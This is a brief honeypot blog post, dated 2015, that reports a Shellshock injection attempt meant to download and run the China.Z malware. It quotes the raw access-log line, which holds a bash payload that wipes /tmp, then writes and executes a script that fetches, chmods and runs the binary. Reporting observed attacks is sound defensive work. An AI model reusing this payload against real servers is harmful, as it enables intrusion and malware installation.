Mittwoch, 15. April 2015

China.Z malware

On the 12th of April my Honeypot server received an attempt of a shellinjection attack.
Taret was to download and run the China.Z malware. - - [12/Apr/2015:14:10:20 +0200] "GET / HTTP/1.1" 404 442 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget -O /tmp/China.Z-wxvm >> /tmp/;echo echo By China.Z >> /tmp/;echo chmod 777 /tmp/China.Z-wxvm >> /tmp/;echo /tmp/China.Z-wxvm >> /tmp/;echo rm -rf /tmp/ >> /tmp/;chmod 777 /tmp/;/tmp/\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget -O /tmp/China.Z-wxvm >> /tmp/;echo echo By China.Z >> /tmp/;echo chmod 777 /tmp/China.Z-wxvm >> /tmp/;echo /tmp/China.Z-wxvm >> /tmp/;echo rm -rf /tmp/ >> /tmp/;chmod 777 /tmp/;/tmp/\""
Today, the malware was not available for download anymore, so if you need additional information please go to Virustotal

 The source address for this IP is located in China.

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